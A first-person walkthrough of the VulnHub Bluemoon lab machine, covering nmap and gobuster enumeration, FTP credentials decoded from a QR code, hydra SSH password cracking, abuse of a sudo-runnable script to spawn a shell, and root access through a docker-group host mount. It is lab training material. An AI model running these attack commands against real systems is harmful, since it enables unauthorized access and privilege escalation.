VulnHub BlueMoon Machine Walkthrough

In this walkthrough, I performed penetration testing on the Bluemoon: 2021 vulnerable machine from VulnHub. The objective of this lab is to obtain flags by gaining access to the system and eventually escalating privileges to root.

Step 1 – Finding the Target IP Address

First, I needed to find the IP address of the vulnerable machine on the network.

To do this, I used netdiscover in Kali Linux:

netdiscover

After scanning the network, I identified the target machine IP address.

Step 2 – Checking Network Information

Before starting the scan, I checked my network configuration to identify my IP address and network range.

I used the following command:

ifconfig

This command displays the network interface information, including the IP address assigned to my machine.

From the output, I identified my IP address and determined that my network range was:

192.168.0.0/24

This information is important because it allows me to know which network range to scan when searching for the target machine.

Step 3 – Discovering the Target Machine

Next, I scanned the network to discover active devices and identify the IP address of the Bluemoon machine.

I used the following Nmap command:

nmap -sn 192.168.0.0/24

This command performs a ping scan to find active hosts in the network.

From the results, I found the target machine with the following IP address: 192.168.0.24

After identifying the target IP address, I performed a more detailed scan to gather information about open ports and services running on the machine. nmap -sC -sV -Pn -vv 192.168.0.24

Step 4 – Directory Enumeration

After identifying that port 80 (HTTP) was open from the Nmap scan, I decided to check the website running on the target machine.

First, I opened the target IP address in a web browser:

http://192.168.0.24/

The webpage did not reveal much useful information. Because of that, I decided to perform directory enumeration to discover hidden directories on the web server.

To do this, I used Gobuster with a common wordlist:

gobuster dir -u http://192.168.0.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

After running the scan, I discovered a hidden directory:

/hidden_text

Inside that directory, there was a link that displayed a QR code image.

Step 5 – Decoding the QR Code

I downloaded the QR code image and decoded it using an online QR decoder.

After decoding the QR code, I obtained FTP credentials:

Username: userftp Password: ftpp@ssword

Step 6 – Accessing the FTP Server

Next, I logged into the FTP service using the credentials found from the QR code.

ftp 192.168.0.24

After logging in, I listed the files:

ls

I found some files and downloaded them to my system for further analysis.

There are two files information.txt and p_lists.txt

Download information.txt and p_lists.txt files using get command .

get information.txt

get p_lists.txt

After downloaded the files, to review it you need to use this command such as:

cat information.txt cat p_lists.txt

Now we going to use hydra tool to crack the password of the Robin.

hydra -l robin -P p_lists.txt ssh://192.168.0.24

Login: robin

Password: k4rv3ndh4nh4ck3r

Step 7 – Getting a User Shell

From the files and information gathered, I was able to log in to the system through SSH as the user robin.

ssh robin@192.168.0.24

Now going to obtain The first flag .

ls -al

cat user1.txt

Step 8 – Privilege Escalation (User robin → user jerry)

Next, I checked the sudo permissions to see what commands could be executed.

sudo -l

cd project

ls

cat feedback.sh

Now execute it as a user jerry.

sudo -u jerry /home/robin/project/feedback.sh

Now enter the name as jerry. And enter your feedback as /bin/bash

whoami

pwd

cd /home/jerry

ls

cat user2.txt

Then we will obtain the second flag.

Step 9 – Privilege Escalation to Root

At this stage, I already gained access to the machine as user jerry, but I still did not have root privileges. To continue the privilege escalation process, I first upgraded the shell to make it more interactive.

I used the following Python command to spawn an interactive bash shell:

python -c 'import pty; pty.spawn("/bin/bash")'

This command improves the shell so it behaves like a normal terminal.

Next, I checked the current user information:

id

From the output, I noticed that the user jerry belongs to the docker group. Being part of the docker group can sometimes allow privilege escalation because Docker containers can be used to access the host system.

To verify the available Docker images, I ran the following command:

docker image ls

The result showed that the Alpine image was available on the system.

Since Docker allows mounting the host filesystem, I used the following command to run the Alpine container and gain root access:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Explanation of the command:

-v /:/mnt → Mounts the host filesystem to the container

--rm → Removes the container after it stops

-it → Runs the container interactively

chroot /mnt sh → Accesses the host system from inside the container

After executing the command, I obtained a root shell.

To confirm that I had root privileges, I ran:

id

The output showed that the current user is root.

Next, I navigated through the system directories:

cd /home ls

Then I moved to the root directory:

cd /root

Finally, I listed the files and retrieved the root flag:

ls -al cat root.txt

The root.txt file contained the final flag, which confirms that I successfully gained root access and completed the challenge.
